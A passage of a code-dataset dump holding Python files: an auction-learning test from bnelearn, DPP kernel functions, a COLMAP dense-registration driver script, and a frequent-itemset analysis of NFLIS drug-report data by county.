torch\nimport torch.nn as nn\n\nfrom bnelearn.bidder import Bidder\nfrom bnelearn.environment import AuctionEnvironment\nfrom bnelearn.mechanism import FirstPriceSealedBidAuction\nfrom bnelearn.learner import ESPGLearner\nfrom bnelearn.strategy import NeuralNetStrategy\nfrom bnelearn.sampler import UniformSymmetricIPVSampler\n\ncuda = torch.cuda.is_available()\ndevice = 'cuda' if cuda else 'cpu'\nspecific_gpu = None\nif cuda and specific_gpu:\n torch.cuda.set_device(specific_gpu)\n\nn_players = 2\nn_items = 1\nu_lo = 0\nu_hi = 10\n\nbatch_size = 2**14\ninput_length = 1\nhidden_nodes = [5,5]\nhidden_activations = [nn.SELU(), nn.SELU()]\nepoch = 100\n\nlearner_hyperparams = {\n 'sigma': 0.1,\n 'population_size': 64,\n 'scale_sigma_by_model_size': False\n}\n\noptimizer_type = torch.optim.SGD\noptimizer_hyperparams = {\n 'lr': 1e-2,\n 'momentum': 0.7\n}\n\nmechanism = FirstPriceSealedBidAuction(cuda = True)\nsampler = UniformSymmetricIPVSampler(u_lo, u_hi, n_players, n_items, batch_size, device)\n\ndef strat_to_bidder(strategy, batch_size, player_position=None): #pylint: disable=redefined-outer-name,missing-docstring\n return Bidder(strategy,\n batch_size = batch_size,\n player_position=player_position,\n enable_action_caching=False\n )\n\ndef test_learning_in_fpsb_environment():\n \"\"\"Tests the same setting as above (2p FPSB symmetric uniform), but with a\n fixed-environment implementation. (2 named agents with a shared model.)\n \"\"\"\n model = NeuralNetStrategy(input_length,\n hidden_nodes= hidden_nodes,\n hidden_activations= hidden_activations,\n ensure_positive_output=torch.tensor([float(u_hi)])\n ).to(device)\n\n bidder1 = strat_to_bidder(model, batch_size,0)\n bidder2 = strat_to_bidder(model, batch_size,1)\n\n env = AuctionEnvironment(mechanism,\n agents = [bidder1, bidder2],\n valuation_observation_sampler = sampler,\n batch_size = batch_size,\n n_players =n_players,\n strategy_to_player_closure = strat_to_bidder)\n learner = ESPGLearner(\n model = model,\n environment = env,\n hyperparams = learner_hyperparams,\n optimizer_type = optimizer_type,\n optimizer_hyperparams = optimizer_hyperparams,\n strat_to_player_kwargs={'player_position':bidder1.player_position})\n\n for _ in range(epoch+1):\n learner.update_strategy()\n\n utility = env.get_reward(env.agents[0])\n\n ## no fail until here means the loop ran properly (i.e. no runtime errors)\n\n ## for upper bound of valuation range, value should be close to optimal.\n bid_at_10 = model(torch.tensor([10.], dtype=torch.float, device = device))\n assert 4 < bid_at_10 < 7, \\\n \"Model failed to learn optimal bid at upper bound. Found {}, expected range [4,7]\".format(bid_at_10)\n\n # after 200 iterations, utility should be reliably above 0.5\n ## warn if not\n if not 1 < utility < 3:\n warnings.warn('Utility {:.2f} is not in expected range [1,3]!'.format(utility))\n","repo_name":"heidekrueger/bnelearn","sub_path":"bnelearn/tests/test_auction_learning.py","file_name":"test_auction_learning.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"39"} +{"seq_id":"37888777269","text":"from scipy.spatial.distance import pdist, squareform\nimport scipy\nfrom numpy import dot\nfrom numpy.linalg import norm\nimport numpy as np\n\n\n\ndef rbf(X, sigma=0.5):\n\tpairwise_dists = squareform(pdist(X, 'euclidean'))\n\tA = scipy.exp(-pairwise_dists ** 2 / (2. 
* sigma ** 2))\n\treturn A\n\ndef cosine_similarity(X):\n\td=[]\n\tcos_sim = lambda a,b: dot(a, b)/(norm(a)*norm(b))\n\tfor i in range(X.shape[0]):\n\t\ttd=[]\n\t\tfor j in range(X.shape[0]):\n\t\t\ttd.append(cos_sim(X[i], X[j]))\n\t\td.append(td)\n\tA= np.array(d)\n\treturn A\n","repo_name":"satwik77/pyDPP","sub_path":"pydpp/kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"39"} +{"seq_id":"39557855176","text":"import subprocess\nimport shutil\nimport os\nimport time\nimport glob\nimport argparse\nimport pycolmap\nfrom utils.lib import *\n# Function to parse command-line arguments\ndef parse_args():\n parser = argparse.ArgumentParser(description='COLMAP Reconstruction Script')\n parser.add_argument('--input_videos', type=str, default='input_videos.txt',\n help='A file with list of vidoes to be processed in all stages')\n parser.add_argument('--sparse_reconstuctions_root', type=str, default='colmap_models/sparse',\n help='Path to the sparsely reconstructed models.')\n parser.add_argument('--dense_reconstuctions_root', type=str, default='colmap_models/dense',\n help='Path to the densely registered models.')\n parser.add_argument('--epic_kithens_root', type=str, default='.',\n help='Path to epic kitchens images.')\n parser.add_argument('--logs_path', type=str, default='logs/dense/out_logs_terminal',\n help='Path to store the log files.')\n parser.add_argument('--summary_path', type=str, default='logs/dense/out_summary',\n help='Path to store the summary files.')\n parser.add_argument('--gpu_index', type=int, default=0,\n help='Index of the GPU to use.')\n\n return parser.parse_args()\n\n\nargs = parse_args()\n\ngpu_index = args.gpu_index\n\nvideos_list = read_lines_from_file(args.input_videos)\nvideos_list = sorted(videos_list)\nprint('GPU: %d' % (gpu_index))\nos.makedirs(args.logs_path, exist_ok=True)\nos.makedirs(args.summary_path, exist_ok=True)\nos.makedirs(args.sparse_reconstuctions_root, exist_ok=True)\nos.makedirs(args.dense_reconstuctions_root, exist_ok=True)\n\n\ni = 0\nfor video in videos_list:\n pre = video.split('_')[0]\n if (not os.path.exists(os.path.join(args.dense_reconstuctions_root, '%s' % video))):\n # check the number of images in this video\n num_lines = len(glob.glob(os.path.join(args.epic_kithens_root,pre,video,'*.jpg')))\n\n print('Processing: ', video, '(',num_lines, 'images )')\n start_time = time.time()\n\n # Define the path to the shell script\n script_path = 'scripts/register_dense.sh'\n\n # Create a unique copy of the script\n script_copy_path = video + '_' + str(os.getpid()) + '_' + os.path.basename(script_path)\n shutil.copy(script_path, script_copy_path)\n\n # Output file\n output_file_path = os.path.join(args.logs_path, script_copy_path.replace('.sh', '.out'))\n\n\n # Define the command to execute the script\n command = [\"bash\", script_copy_path, video,args.sparse_reconstuctions_root,args.dense_reconstuctions_root,args.epic_kithens_root,args.summary_path,str(gpu_index)]\n # Open the output file in write mode\n with open(output_file_path, 'w') as output_file:\n # Run the command and capture its output in real time\n process = subprocess.Popen(command, stdout=output_file, stderr=subprocess.PIPE, text=True)\n while True:\n output = process.stderr.readline()\n if output == '' and process.poll() is not None:\n break\n if output:\n output_file.write(output)\n output_file.flush()\n\n # Once the script has finished running, you can delete the 
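Back on the kernels record just above: the nested-loop cosine_similarity is O(n²) Python-level work, while the same matrix falls out of a single normalized matrix product. A vectorized sketch (assumes no zero-norm rows in X):

```python
import numpy as np

def cosine_similarity_vec(X):
    # Normalize each row to unit length; pairwise cosines are then
    # just dot products of unit vectors.
    Xn = X / np.linalg.norm(X, axis=1, keepdims=True)
    return Xn @ Xn.T
```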
copy of the script\n os.remove(script_copy_path)\n\n\n reg_images = get_num_images(os.path.join(args.dense_reconstuctions_root,video))\n if reg_images > 0:\n print(f\"Registered_images/total_images: {reg_images}/{num_lines} = {round(reg_images/num_lines*100)}%\")\n else:\n print('The video reconstruction fails!! no colmap files are found!')\n\n\n\n\n print(\"Execution time: %s minutes\" % round((time.time() - start_time)/60, 0))\n print('-----------------------------------------------------------')\n\n i += 1\n\n","repo_name":"epic-kitchens/epic-fields-code","sub_path":"register_dense.py","file_name":"register_dense.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"39"} +{"seq_id":"2704195967","text":"from sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.gaussian_process import GaussianProcessRegressor\r\nimport sklearn.svm as skS\r\nimport sklearn.neighbors as skN\r\nimport pandas as pd\r\nimport numpy\r\nfrom tensorflow.keras import layers\r\nfrom tensorflow import keras\r\nimport xlrd\r\nimport xlwt\r\nimport math\r\nimport sklearn\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport orangecontrib.associate.fpgrowth as oaf\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nw_list = []\r\nwith tf.Session() as sess:\r\n for year in [year for year in range(2010, 2018)]:\r\n X = tf.nn.sigmoid((year - 2010) / 3)\r\n num = sess.run(X)\r\n w = 2.0 * (1.0 - num)\r\n # print(w)\r\n w_list.append(w)\r\n # print(X)\r\n\r\nbook = xlrd.open_workbook(\"MCM_NFLIS_Data.xlsx\")\r\nfor sheet in book.sheets():\r\n print(sheet.name)\r\n\r\nsheet_new = book.sheet_by_name(\"Data\")\r\nprint(\"nrows:\", sheet_new.nrows)\r\n\r\n# State name\r\nSN = []\r\nSN_dcit = {}\r\nfor i in range(1, sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n SN.append(process_data[1])\r\nSN = set(SN)\r\nfor key in SN:\r\n num = 0.0\r\n for i in range(sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n # SN.append(process_data[1])\r\n if process_data[1] == key:\r\n num = process_data[3]\r\n break\r\n\r\n SN_dcit.update({key: num})\r\n# print(SN_dcit)\r\n\r\n# County name\r\nCN_all = {}\r\nfor N in SN:\r\n CN = []\r\n CN_dict = {}\r\n for i in range(sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n if process_data[1] == N:\r\n CN.append(process_data[2])\r\n CN = set(CN)\r\n for key in CN:\r\n num = 0.0\r\n for i in range(sheet_new.nrows):\r\n process_data = sheet_new.row_values(i)\r\n # SN.append(process_data[1])\r\n if process_data[2] == key and process_data[1] == N:\r\n num = process_data[5]\r\n # print(num)\r\n break\r\n\r\n CN_dict.update({key: num})\r\n\r\n # print(CN_dict)\r\n CN_all.update({N: CN_dict})\r\n\r\n\r\ndef get_data(med_name, state_name):\r\n file_name = \"data/\" + med_name + \".txt\"\r\n with open(file_name, \"r\") as f:\r\n temp = f.read()\r\n _dict = eval(temp)\r\n\r\n CN = CN_all[state_name]\r\n # print(CN)\r\n # print(CN.values())\r\n CN_list = [key for key in CN]\r\n\r\n ouput_data = {}\r\n # {year: {numbering: {'DR': num, 'name': str}}}\r\n for key in _dict:\r\n ouput_data.update({key: []})\r\n for index in range(len(CN_list)):\r\n numbering = CN[CN_list[index]]\r\n # print(numbering)\r\n if numbering not in _dict[key]:\r\n ouput_data[key].append(0)\r\n else:\r\n num = _dict[key][numbering][\"DR\"]\r\n ouput_data[key].append(num)\r\n\r\n out = []\r\n for key in ouput_data:\r\n # print(key)\r\n 
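The Popen usage in this register_dense record (redirect stdout to a log file, poll stderr line by line until the process exits) is a reusable pattern; here is the same idea as a small generic helper, illustrative only, with a placeholder command:

```python
import subprocess

def run_and_log(cmd, log_path):
    with open(log_path, 'w') as log:
        proc = subprocess.Popen(cmd, stdout=log, stderr=subprocess.PIPE, text=True)
        for line in proc.stderr:  # iterating replaces the manual readline loop
            log.write(line)
            log.flush()
        return proc.wait()        # propagate the exit code

# run_and_log(['bash', 'some_script.sh'], 'run.out')
```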
out.append(ouput_data[key])\r\n\r\n # print(ouput_data)\r\n # print(out)\r\n # return ouput_data\r\n return out, CN_list\r\n\r\n\r\n# data_test, CN_list = get_data(\"Heroin\", \"VA\")\r\n\r\n# Threshold = 5\r\n# n = 21\r\n\r\n# # print(len(data_test))\r\n# data_test_temp = data_test.copy()\r\n# length = len(data_test)\r\n# data_test_temp = np.array(data_test_temp)\r\n# CN_list_temp = CN_list.copy()\r\n\r\n# l = np.array([])\r\n# for j in range(len(CN_list)):\r\n# sum = 0\r\n# for i in range(length):\r\n# sum = sum + data_test[i][j]\r\n# l = np.append(l, sum)\r\n\r\n# # Sort\r\n# l.sort()\r\n# # print(l)\r\n\r\n# cnt = 0\r\n# for j in range(len(CN_list)):\r\n# sum = 0\r\n# for i in range(length):\r\n# sum = sum + data_test[i][j]\r\n# # print(sum)\r\n# if sum <= l[len(l) - n - 1]:\r\n# data_test_temp = np.delete(data_test_temp, j-cnt, axis=1)\r\n# CN_list_temp.remove(CN_list[j])\r\n# cnt = cnt + 1\r\n\r\n# data_test = data_test_temp.tolist()\r\n# CN_list = CN_list_temp.copy()\r\n# print(\"Shape: (%d, %d)\" % (len(data_test), len(data_test[0])))\r\n\r\n# for in1 in range(len(data_test)):\r\n# cnt = 1\r\n# for in2 in range(len(data_test[0])):\r\n# if data_test[in1][in2] > Threshold:\r\n# data_test[in1][in2] = cnt\r\n# else:\r\n# data_test[in1][in2] = 0\r\n# cnt = cnt + 1\r\n\r\n# # print(data_test)\r\n\r\n\r\ndef tool_trans(l):\r\n out = []\r\n for i in range(len(l)):\r\n if l[i] != 0:\r\n out.append(l[i])\r\n\r\n return out\r\n\r\n\r\n# # print(tool_trans([1, 0, 3]))\r\n# for in3 in range(len(data_test)):\r\n# data_test[in3] = tool_trans(data_test[in3])\r\n\r\n# print(data_test)\r\n# print(data_test)\r\n# dict_get_test = dict(oaf.frequent_itemsets(data_test, 2))\r\n# print(dict_get_test)\r\n# for key in dict_get_test:\r\n# print(key,\":\", dict_get_test[key])\r\n\r\n\r\ndef sepP(dataset):\r\n\r\n def tool_temp(index, formL, behindL):\r\n outL = []\r\n for i in range(len(formL)):\r\n if i != index:\r\n outL.append(behindL[i])\r\n else:\r\n outL.append(formL[index])\r\n\r\n return outL\r\n\r\n output_data = []\r\n for in1 in range(1, len(dataset)):\r\n for in2 in range(len(dataset[0])):\r\n temp_l = tool_temp(in2, dataset[in1-1], dataset[in1])\r\n output_data.append(temp_l)\r\n\r\n return output_data\r\n\r\n\r\ndef get_data_pro(med_name, state_name, Threshold=66, n=20):\r\n file_name = \"data/\" + med_name + \".txt\"\r\n with open(file_name, \"r\") as f:\r\n temp = f.read()\r\n _dict = eval(temp)\r\n\r\n CN = CN_all[state_name]\r\n # print(CN)\r\n # print(CN.values())\r\n CN_list = [key for key in CN]\r\n\r\n ouput_data = {}\r\n # {year: {numbering: {'DR': num, 'name': str}}}\r\n for key in _dict:\r\n ouput_data.update({key: []})\r\n for index in range(len(CN_list)):\r\n numbering = CN[CN_list[index]]\r\n # print(numbering)\r\n if numbering not in _dict[key]:\r\n ouput_data[key].append(0)\r\n else:\r\n num = _dict[key][numbering][\"DR\"]\r\n ouput_data[key].append(num)\r\n\r\n data_test = []\r\n for key in ouput_data:\r\n # print(key)\r\n data_test.append(ouput_data[key])\r\n\r\n # print(ouput_data)\r\n # print(out)\r\n # return ouput_data\r\n # return out, CN_list\r\n\r\n # data_test, CN_list = get_data(\"Heroin\", \"VA\")\r\n\r\n # Threshold = 5\r\n # n = 21\r\n\r\n # print(len(data_test))\r\n data_test_temp = data_test.copy()\r\n length = len(data_test)\r\n data_test_temp = np.array(data_test_temp)\r\n CN_list_temp = CN_list.copy()\r\n\r\n l = np.array([])\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n l = np.append(l, 
sum)\r\n\r\n # Sort\r\n l.sort()\r\n # print(l)\r\n\r\n cnt = 0\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n # print(sum)\r\n if sum <= l[len(l) - n - 1]:\r\n data_test_temp = np.delete(data_test_temp, j-cnt, axis=1)\r\n CN_list_temp.remove(CN_list[j])\r\n cnt = cnt + 1\r\n\r\n data_test = data_test_temp.tolist()\r\n CN_list = CN_list_temp.copy()\r\n\r\n data_test = sepP(data_test)\r\n\r\n print(\"Shape: (%d, %d)\" % (len(data_test), len(data_test[0])))\r\n print(\"CN_list shape: %d.\" % len(CN_list))\r\n\r\n for in1 in range(len(data_test)):\r\n cnt = 1\r\n for in2 in range(len(data_test[0])):\r\n if data_test[in1][in2] > Threshold:\r\n data_test[in1][in2] = cnt\r\n else:\r\n data_test[in1][in2] = 0\r\n cnt = cnt + 1\r\n\r\n # print(data_test)\r\n\r\n def tool_trans(l):\r\n out = []\r\n for i in range(len(l)):\r\n if l[i] != 0:\r\n out.append(l[i])\r\n\r\n return out\r\n\r\n # print(tool_trans([1, 0, 3]))\r\n for in3 in range(len(data_test)):\r\n data_test[in3] = tool_trans(data_test[in3])\r\n\r\n return data_test, CN_list\r\n\r\n\r\n# data_test, CN_list = get_data_pro(\"Heroin\", \"VA\")\r\n# # print(data_test)\r\n# dict_get_test = dict(oaf.frequent_itemsets(data_test, min_support=120))\r\n# # print(dict_get_test)\r\n# print(len(dict_get_test))\r\n\r\n\r\n# def fuck(string):\r\n# list_out = []\r\n# tempStr = \"\"\r\n# ifB = False\r\n# for i in range(len(string)):\r\n# temp = string[i]\r\n# # print(temp)\r\n# # print(temp.isalnum())\r\n# if temp.isalnum():\r\n# # print(\"#\")\r\n# tempStr = tempStr + temp\r\n# ifB = True\r\n# if (temp.isalnum() == False) and ifB:\r\n# # break\r\n# list_out.append(int(tempStr))\r\n# tempStr = ''\r\n# ifB = False\r\n\r\n# # print(list_out)\r\n# return list_out\r\n\r\n\r\n# # fuck(\"[3, 4, 6, 11, 14, 15, 17, 19, 20]\")\r\n\r\n\r\n# def match(string):\r\n# string_ = \"\"\r\n# for i in range(len(string)):\r\n# # print(string[i])\r\n# if string[i] == \"{\":\r\n# for j in range(i, len(string)):\r\n# if string[j] != \"}\":\r\n# if string[j] == '{':\r\n# string_ = string_ + '['\r\n# else:\r\n# string_ = string_ + string[j]\r\n# else:\r\n# string_ = string_ + \"]\"\r\n# break\r\n# break\r\n\r\n# # def fuck(string):\r\n# # list_out = []\r\n# # tempStr = \"\"\r\n# # ifB = False\r\n# # for i in range(len(string)):\r\n# # temp = string[i]\r\n# # if temp.isalnum and (!ifB):\r\n# # tempStr = tempStr + temp\r\n# # ifB = True\r\n# # if (!temp.isalnum) and ifB:\r\n# # # break\r\n# # list_out.append( int(tempStr))\r\n# # tempStr = ''\r\n# # ifB = False\r\n\r\n# # return list_out\r\n\r\n# # print(string_)\r\n# # list_ = list(string_)\r\n# list_ = fuck(string_)\r\n# return list_\r\n\r\n\r\n# # print(type(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\")))\r\n# # print(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\"))\r\n\r\n# # # {index: list}\r\n# # # {index: lenght}\r\n# # ILi = {}\r\n# # ILe = {}\r\n\r\n# # Get max\r\n# M = 0\r\n# for Max in range(1, 20):\r\n# ifE = False\r\n# for key in dict_get_test:\r\n# # a = 0\r\n# value = dict_get_test[key]\r\n\r\n# # print(type(key))\r\n# str_key = str(key)\r\n# # print(str_key)\r\n# # print(key)\r\n# list_key = match(str_key)\r\n# # print(list_key)\r\n# if len(list_key) == Max:\r\n# # print(value)\r\n# # print(list_key)\r\n# # a = 0\r\n# # print(\"!\")\r\n# ifE = True\r\n# break\r\n\r\n# if ifE:\r\n# pass\r\n# else:\r\n# # print(list_key)\r\n# M = Max - 1\r\n# break\r\n\r\n# print(M)\r\n\r\n# for key in dict_get_test:\r\n# # a = 0\r\n# value = 
dict_get_test[key]\r\n\r\n# # print(type(key))\r\n# str_key = str(key)\r\n# # print(str_key)\r\n# # print(key)\r\n# list_key = match(str_key)\r\n# # print(list_key)\r\n# if len(list_key) == M:\r\n# # if value != 140:\r\n# # print(value)\r\n# print(value)\r\n# print(list_key)\r\n# # a = 0\r\n# # ifE = True\r\n# # break\r\n\r\n# if len(list_key) == 1:\r\n# print(value)\r\n# print(list_key)\r\n\r\ndef END(med_name, state_name, year_start=2010.0, Threshold=66, n=20, min_support=120, bias=1.1):\r\n file_name = \"data/\" + med_name + \".txt\"\r\n with open(file_name, \"r\") as f:\r\n temp = f.read()\r\n _dict = eval(temp)\r\n\r\n CN = CN_all[state_name]\r\n # print(CN)\r\n # print(CN.values())\r\n CN_list = [key for key in CN]\r\n\r\n ouput_data = {}\r\n # {year: {numbering: {'DR': num, 'name': str}}}\r\n year_start = int(year_start)\r\n for key in _dict:\r\n if key >= year_start:\r\n # print(\"!!!!!!!!!!!!!!!\")\r\n # print(key)\r\n # print(type(key))\r\n ouput_data.update({key: []})\r\n for index in range(len(CN_list)):\r\n numbering = CN[CN_list[index]]\r\n # print(numbering)\r\n if numbering not in _dict[key]:\r\n ouput_data[key].append(0)\r\n else:\r\n num = _dict[key][numbering][\"DR\"]\r\n ouput_data[key].append(num)\r\n\r\n data_test = []\r\n for key in ouput_data:\r\n # print(key)\r\n data_test.append(ouput_data[key])\r\n\r\n # print(ouput_data)\r\n # print(out)\r\n # return ouput_data\r\n # return out, CN_list\r\n\r\n # data_test, CN_list = get_data(\"Heroin\", \"VA\")\r\n\r\n # Threshold = 5\r\n # n = 21\r\n\r\n # print(len(data_test))\r\n data_test_temp = data_test.copy()\r\n length = len(data_test)\r\n data_test_temp = np.array(data_test_temp)\r\n CN_list_temp = CN_list.copy()\r\n\r\n l = np.array([])\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n l = np.append(l, sum)\r\n\r\n # Sort\r\n l.sort()\r\n # print(np.shape(l))\r\n # print(l)\r\n\r\n cnt = 0\r\n for j in range(len(CN_list)):\r\n sum = 0\r\n for i in range(length):\r\n sum = sum + data_test[i][j]\r\n # print(sum)\r\n if sum <= l[len(l) - n - 1]:\r\n data_test_temp = np.delete(data_test_temp, j-cnt, axis=1)\r\n CN_list_temp.remove(CN_list[j])\r\n cnt = cnt + 1\r\n\r\n data_test = data_test_temp.tolist()\r\n CN_list = CN_list_temp.copy()\r\n\r\n dataset_one = data_test.copy()\r\n # print(len(data_test))\r\n # print(len(data_test[0]))\r\n data_test = sepP(data_test)\r\n # print(data_test)\r\n # dataset_one = data_test.copy()\r\n\r\n # print(\"Shape: (%d, %d)\" % (len(data_test), len(data_test[0])))\r\n # print(\"CN_list shape: %d.\" % len(CN_list))\r\n\r\n for in1 in range(len(data_test)):\r\n cnt = 1\r\n for in2 in range(len(data_test[0])):\r\n if data_test[in1][in2] > Threshold:\r\n data_test[in1][in2] = cnt\r\n else:\r\n data_test[in1][in2] = 0\r\n cnt = cnt + 1\r\n\r\n # print(data_test)\r\n\r\n def tool_trans(l):\r\n out = []\r\n for i in range(len(l)):\r\n if l[i] != 0:\r\n out.append(l[i])\r\n\r\n return out\r\n\r\n # print(tool_trans([1, 0, 3]))\r\n for in3 in range(len(data_test)):\r\n data_test[in3] = tool_trans(data_test[in3])\r\n\r\n # return data_test, CN_list\r\n\r\n # data_test, CN_list = get_data_pro(\"Heroin\", \"VA\")\r\n # print(data_test)\r\n dict_get_test = dict(oaf.frequent_itemsets(data_test, min_support))\r\n # print(dict_get_test)\r\n # print(len(dict_get_test))\r\n\r\n def fuck(string):\r\n list_out = []\r\n tempStr = \"\"\r\n ifB = False\r\n for i in range(len(string)):\r\n temp = string[i]\r\n # print(temp)\r\n # 
print(temp.isalnum())\r\n if temp.isalnum():\r\n # print(\"#\")\r\n tempStr = tempStr + temp\r\n ifB = True\r\n if (temp.isalnum() == False) and ifB:\r\n # break\r\n list_out.append(int(tempStr))\r\n tempStr = ''\r\n ifB = False\r\n\r\n # print(list_out)\r\n return list_out\r\n\r\n # fuck(\"[3, 4, 6, 11, 14, 15, 17, 19, 20]\")\r\n\r\n def match(string):\r\n string_ = \"\"\r\n for i in range(len(string)):\r\n # print(string[i])\r\n if string[i] == \"{\":\r\n for j in range(i, len(string)):\r\n if string[j] != \"}\":\r\n if string[j] == '{':\r\n string_ = string_ + '['\r\n else:\r\n string_ = string_ + string[j]\r\n else:\r\n string_ = string_ + \"]\"\r\n break\r\n break\r\n\r\n # def fuck(string):\r\n # list_out = []\r\n # tempStr = \"\"\r\n # ifB = False\r\n # for i in range(len(string)):\r\n # temp = string[i]\r\n # if temp.isalnum and (!ifB):\r\n # tempStr = tempStr + temp\r\n # ifB = True\r\n # if (!temp.isalnum) and ifB:\r\n # # break\r\n # list_out.append( int(tempStr))\r\n # tempStr = ''\r\n # ifB = False\r\n\r\n # return list_out\r\n\r\n # print(string_)\r\n # list_ = list(string_)\r\n list_ = fuck(string_)\r\n return list_\r\n\r\n # print(type(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\")))\r\n # print(match(\"frozenset({3, 4, 6, 11, 14, 15, 17, 19, 20})\"))\r\n\r\n # # {index: list}\r\n # # {index: lenght}\r\n # ILi = {}\r\n # ILe = {}\r\n\r\n # Get max\r\n M = 0\r\n for Max in range(1, 20):\r\n ifE = False\r\n for key in dict_get_test:\r\n # a = 0\r\n value = dict_get_test[key]\r\n\r\n # print(type(key))\r\n str_key = str(key)\r\n # print(str_key)\r\n # print(key)\r\n list_key = match(str_key)\r\n # print(list_key)\r\n if len(list_key) == Max:\r\n # print(value)\r\n # print(list_key)\r\n # a = 0\r\n # print(\"!\")\r\n ifE = True\r\n break\r\n\r\n if ifE:\r\n pass\r\n else:\r\n # print(list_key)\r\n M = Max - 1\r\n break\r\n\r\n # print(M)\r\n\r\n value_M = 0\r\n end_list = []\r\n one_ele = {}\r\n for key in dict_get_test:\r\n # a = 0\r\n value = dict_get_test[key]\r\n\r\n # print(type(key))\r\n str_key = str(key)\r\n # print(str_key)\r\n # print(key)\r\n list_key = match(str_key)\r\n # print(list_key)\r\n if len(list_key) == M:\r\n # if value != 140:\r\n # print(value)\r\n if value > value_M:\r\n value_M = value\r\n # print(value_M)\r\n end_list = list_key\r\n # print(value)\r\n # print(list_key)\r\n\r\n # a = 0\r\n # ifE = True\r\n # break\r\n\r\n if len(list_key) == 1:\r\n # print(value)\r\n # print(list_key)\r\n one_ele.update({list_key[0]: value})\r\n\r\n # print(one_ele)\r\n scores = {}\r\n for ele in end_list:\r\n name = CN_list[ele-1]\r\n score_temp = value_M / one_ele[ele]\r\n scores.update({name: score_temp})\r\n\r\n # print(scores)\r\n\r\n # print(end_list)\r\n for ele in end_list:\r\n # print(ele)\r\n # print(CN_list[ele])\r\n arr_temp = np.array([])\r\n # print(len(dataset_one))\r\n # print(len(dataset_one[0]))\r\n for i in range(len(dataset_one)):\r\n # print(dataset_one[i][ele])\r\n arr_temp = np.append(arr_temp, dataset_one[i][ele - 1])\r\n\r\n # m = arr_temp.mean()\r\n # s2 = arr_temp.var()\r\n # s = math.sqrt(s2)\r\n min_n = arr_temp.min()\r\n max_n = arr_temp.max()\r\n cnt = 0\r\n for e in arr_temp:\r\n arr_temp[cnt] = (e - min_n) / (max_n-min_n)\r\n # print(arr_temp[cnt])\r\n cnt = cnt + 1\r\n # print(arr_temp)\r\n # print(data_test)\r\n\r\n score = 0.0\r\n for i in range(len(arr_temp)):\r\n # print(w_list[i])\r\n score = score + arr_temp[i] * w_list[i]\r\n\r\n # print(score)\r\n name = CN_list[ele-1]\r\n # scores.update({name: score})\r\n 
scores[name] = scores[name] + bias * score\r\n\r\n # print(scores)\r\n output_scores = {}\r\n output_scores.update({state_name: scores})\r\n return output_scores\r\n\r\n\r\n# scores_test = END(\"Heroin\", \"VA\", Threshold=67,\r\n # n=21, min_support=120, bias=1.1)\r\n# print(scores_test)\r\n# print(len(scores_test[]))\r\nX = []\r\nY = []\r\nfor i in range(30, 150):\r\n X.append(i / 10.0)\r\n scores_test = END(\"Heroin\", \"VA\", Threshold=70,\r\n n=21, min_support=i, bias=1.1)\r\n print(len(scores_test[\"VA\"]))\r\n Y.append(len(scores_test[\"VA\"]))\r\n\r\nplt.figure()\r\nplt.xlabel(\"min-support / 10\")\r\nplt.ylabel(\"the length of FPS\")\r\nplt.plot(X, Y)\r\nplt.savefig(\"tttttt.jpg\")\r\n\r\n# X = tf.nn.sigmoid(1.0)\r\n# with tf.Session() as sess:\r\n# print(sess.run(X))\r\n# # print(X)\r\n\r\n# print(SN)\r\n\r\n# l_T = []\r\n# l_Le = []\r\n# # print(len(SN))\r\n# SN = list(SN)\r\n# print(SN)\r\n# cnt = 0\r\n# # for s in [\"OH\"]:\r\n# # for s in SN:\r\n# # for s in ['KY', 'VA', 'WV']:\r\n# for s in [\"VA\"]:\r\n# print(s)\r\n# for T in range(20, 100):\r\n# print(\".\")\r\n# scores_test = END(\"Heroin\", s, Threshold=T,\r\n# n=21, min_support=120, bias=1.1)\r\n\r\n# # print(scores_test)\r\n# # print(scores_test)\r\n# # print(len(scores_test[]))\r\n# temp = len(scores_test[s])\r\n# sUm = 0\r\n# for key in scores_test[s]:\r\n# sUm = sUm + scores_test[s][key]\r\n# temp = sUm / temp\r\n# # print(temp)\r\n# l_T.append(T)\r\n# l_Le.append(temp)\r\n# cnt = cnt + 1\r\n\r\n# out_scores = END(\"Heroin\", \"VA\", Threshold=60,\r\n# n=21, min_support=120, bias=1.1)\r\n# # print(out_scores)\r\n# scores_list = out_scores[\"VA\"]\r\n\r\n\r\n# def generation(state_name, year, min_s, T):\r\n# out_scores = END(\"Heroin\", state_name, year_start=year, Threshold=T,\r\n# n=21, min_support=min_s, bias=1.1)\r\n# # print(out_scores)\r\n# scores_list = out_scores[state_name]\r\n\r\n# file = xlwt.Workbook(encoding='utf-8')\r\n# sheet = file.add_sheet('Location_Num', cell_overwrite_ok=True)\r\n# sheet.write(0, 0, \"Latitude\")\r\n# sheet.write(0, 1, \"Longitude\")\r\n# sheet.write(0, 2, \"Data\")\r\n\r\n# # Read test\r\n# with open('LL.txt', 'r') as f:\r\n# a = f.read()\r\n# name_dict = eval(a)\r\n# # print(len(name_dict))\r\n# # print(dict_name)\r\n\r\n# def Change(key):\r\n# string = \"\"\r\n# # StateName = {\"VA\": \"Virginia\", \"OH\": \"Ohio\",\r\n# # \"PA\": \"Pennsylvania\", \"KY\": \"Kentucky\", \"WV\": \"West Virginia\"}\r\n# # StateName[state_name]\r\n\r\n# for c in key:\r\n# if c != \",\":\r\n# string = string + c\r\n# else:\r\n# break\r\n\r\n# # print(string)\r\n# return string\r\n\r\n# cnt = 1\r\n# 